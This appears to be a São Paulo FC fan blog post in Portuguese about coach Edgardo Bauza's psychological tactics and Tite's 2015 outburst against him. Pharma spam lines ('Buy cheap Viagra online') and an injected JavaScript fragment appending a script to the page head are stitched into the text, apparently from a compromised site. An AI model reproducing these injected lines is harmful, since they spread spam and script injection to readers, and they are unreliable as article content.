Destaque Noticia

Bauza tem como estilo fazer jogos psicológicos e em 2015 fez Tite ter xilique em coletiva

pills Buy cheap Viagra online

Logo após a contratação de Bauza um episódio veio à mente: o chilique de Tite com Bauza sobre uma argumentação do treinador de “conluio” entre São Paulo e Corinthians na Libertadores de 2015. O fato passou batido para a maioria mas incomodou muito ao treinador do time sem cor.

Bauza articula bem e efetua jogos psicológicos nos adversários imputando responsabilidade, tirando confiança e manipulando como entende a situação antes dos jogos. No caso da rivalidade local, é um começo para ele e temos um retrospecto recentemente vergonhoso.

Tite recuou recentemente e elogiou Bauza:

“Independentemente do estilo, tenho a frase feita de que campeão a gente respeita. E respeito o Bauza pelo campeão que é. Não vou entrar em outros méritos, se gosto ou não do estilo dele. Eu o respeito como campeão. Ele tem uma característica parecida com a minha, de ser mais sóbrio, discreto. É algo que temos em comum”.

Já Bauza falou o seguinte de Tite:

“É um técnico muito brasileiro”, disse, ao ser questionado se o estilo de Tite era argentino. “Suas equipes têm um desenho tático que as tornam difíceis de bater. Ele foi campeão e é um dos melhores técnicos do País por isso. Já tive a possibilidade de enfrentá-lo e foi uma satisfação. Será assim novamente. É inteligente, com times com uma identidade muito clara e seguros do que querem”

Como será daqui em diante? Veja a matéria que o Blog do São Paulo fez em 19/12/2015 a respeito:

“Um episódio polêmico em que Tite simplesmente dá um enorme chilique após uma declaração com motivação psicológica depois do jogo entre San Lorenzo e Corinthians que acabou em 0x0 no Itaquerão, mostra o estilão do novo treinador. Cobrando uma postura digna do Corinthians e do treinador, ele comentou sobre a conduta do time do treinador no jogo e como seria no jogo contra o São Paulo no Morumbi que determinaria a classificação do Tricolor em caso de derrota do time sem cor. O jogo terminou 2×0 para o São Paulo.

Veja a matéria e assista ao vídeo do chilique. Parece que em 2016 a coisa vai esquentar na rivalidade entre São Paulo e Corinthians e não seremos mais os cordeirinhos que fomos em 2015. A postura começará fora de campo com Bauza sendo respeitoso mas arrojado e articulado estrategicamente? Como será, Tricolor?


“Isso é uma baixaria que não serve para mim! Para mim, não serve! Esse tipo de ilação não serve! Tenho respeito às pessoas e instituições. Não sou técnico do Corinthians, eu estou técnico. Ninguém vai levantar a minha condição! Ninguém! Tenho muito orgulho da minha carreira! Muito!”, afirmou.

“Ninguém chuta 17 bolas se não quer vencer. Eu não sei qual a intenção dele (Bauza). Mas posso falar a respeito da história do Corinthians e tenho o dever de falar”

O que você acha deste perfil de Bauza, Tricolor?

Fonte: Blog do São Paulod.getElementsByTagName(‘head’)[0].appendChild(s); purchase a at a low figure tablets online

Clique para adicionar um comentário

Leave a Reply

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

16 − doze =

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.

Destaque Noticia

Mais em Destaque Noticia

São Paulo marca 61% dos seus gols no segundo tempo

saopauloadmin29 de novembro de 2020

CBF admite erro da arbitragem na revisão de gol do São Paulo

saopauloadmin26 de novembro de 2020

Diniz não garante substituto de Brenner, mas afirma: “Confiança plena em quem entrar”

saopauloadmin25 de novembro de 2020

Apesar de empate frustrante, São Paulo atinge 12 jogos de invencibilidade e está perto de 3a maior marca em Brasileiros desde 2006

saopauloadmin23 de novembro de 2020

Ceni pede ao juiz para jogo acabar: “Meu time sem chance”

saopauloadmin19 de novembro de 2020

Vai ter festa no Morumbi! Quarta-feira às 19h00, recepção do ônibus tricolor

saopauloadmin16 de novembro de 2020

Rodrigo Nestor comemora estreia no São Paulo: ‘Sonhava desde criança’

saopauloadmin15 de novembro de 2020

Brenner foi aposta de Ceni no São Paulo aos 17 anos; hoje é carrasco

saopauloadmin12 de novembro de 2020

Diniz: O Flamengo poderia ter aproveitado, mas não aproveitaram as chances de erros nossos

saopauloadmin12 de novembro de 2020